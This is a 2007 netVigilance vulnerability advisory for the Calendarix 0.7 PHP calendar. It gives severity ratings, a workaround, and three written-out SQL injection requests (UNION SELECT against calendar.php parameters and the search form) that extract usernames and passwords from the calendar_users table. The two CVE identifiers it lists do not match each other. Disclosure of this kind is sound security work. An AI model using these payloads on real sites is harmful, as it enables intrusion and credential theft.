netVigilance Security Advisory #38 Calendarix version 0.7. 20070307 Multiple SQL Injection Vulnerabilities Description: Calendarix is a powerful and easy to use calendar based on PHP and MySQL. It has been developed with ease of use and quick access to information in mind. It provides the user with the quickest possible navigation and accessing the most commonly used functions in the shortest steps. Successful exploitation requires PHP magic_quotes_gpc set to Off. External References: Mitre CVE: CVE-2007-3183 NVD NIST: CVE-2007-3128 OSVDB: 35373 Summary: Calendarix is a powerful and easy to use calendar based on PHP and MySQL. A security problems in the product allow attackers to commit SQL injection attacks. Advisory URL: Release Date: 06/19/2007 Severity: Risk: High CVSS Metrics: Access Vector: Remote Access Complexity: High Authentication: Not-required Confidentiality Impact: Complete Integrity Impact: Partial Availability Impact: Partial Impact Bias: Confidentiality CVSS Base Score: 6.8 Target Distribution on Internet: Low Exploitability: Functional Exploit Remediation Level: Workaround Report Confidence: Uncorroborated Vulnerability Impact: Attack Host Impact: SQL Injection SecureScout Testcase ID: TC 17966 Vulnerable Systems: Calendarix version 0.7. 20070307 Vulnerability Type: SQL injection allows malicious people to execute their own SQL scripts. This could be exploited to obtain sensitive data, modify database contents or acquire administrator's privileges. Vendor: Vincent Hor (Calendarix Enterprise) Vendor Status: Vincent Hor of Calendarix Enterprise was not interested in coordinating release of Patch and Security Advisory, There is no official solution at this time. Workaround: In the php.ini file set magic_quotes_gpc = On. Example: SQL Injection Attack Vulnerability 1: REQUEST: http://[TARGET]/[PRODUCT-DIRECTORY]/calendar.php?month=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23 REPLY: ...<table class=eventborder border=1 cellspacing=0 cellpadding=0 width='100%'><tr><td align=center class=eventtimeborder valign=top><div class=smallcalevtime>[SQL INJECTION RESULT: ADMIN NAME]<br/>1</td><td align=left valign=top width='80%' class=eventborder><a class=smallcalev href="Javascript:void(0);" onclick="Javascript:popup(1);">[SQL INJECTION RESULT: ADMIN PASSWORD]</a></td></tr></table><tr><td align=center valign=top> ... <table class=eventborder border=1 cellspacing=0 cellpadding=0 width='100%'><tr><td align=center class=eventtimeborder valign=top><div class=smallcalevtime>[SQL INJECTION RESULT: ALL USERs NAME]<br/>1</td><td align=left valign=top width='80%' class=eventborder><a class=smallcalev href="Javascript:void(0);" onclick="Javascript:popup(1);">[SQL INJECTION RESULT: ALL USERS PASSWORD]</a></td></tr></table></table>... SQL Injection Attack Vulnerability 2: REQUEST: http://[TARGET]/[PRODUCT-DIRECTORY]/calendar.php?month=&year=' UNION SELECT 1, 1, `password`, `username` ,1 FROM `calendar_users` %23 REPLY: <div class=smallcalevtime>[SQL INJECTION RESULT: ADMIN NAME] ...[SQL INJECTION RESULT: ADMIN PASSWORD]</a> ... <div class=smallcalevtime>[SQL INJECTION RESULT: ALL USERs NAME]...[SQL INJECTION RESULT: ALL USERS PASSWORD]</a>... SQL Injection Attack Vulnerability 3: REQUEST: http://[TARGET]/[PRODUCT-DIRECTORY]/cal_search.php in the search string enter: %') UNION SELECT 1,1,CONCAT(`username`,`password`),1,1,1,1,1 FROM `calendar_users` # press button "Search" REPLY: ...<div class=searchtextfont>[SQL INJECTION RESULT: ADMIN NAME ADMIN PASSWORD]. ...</div>... Credits: Jesper Jurcenoks Co-founder netVigilance, Inc ?? ?? ?? ??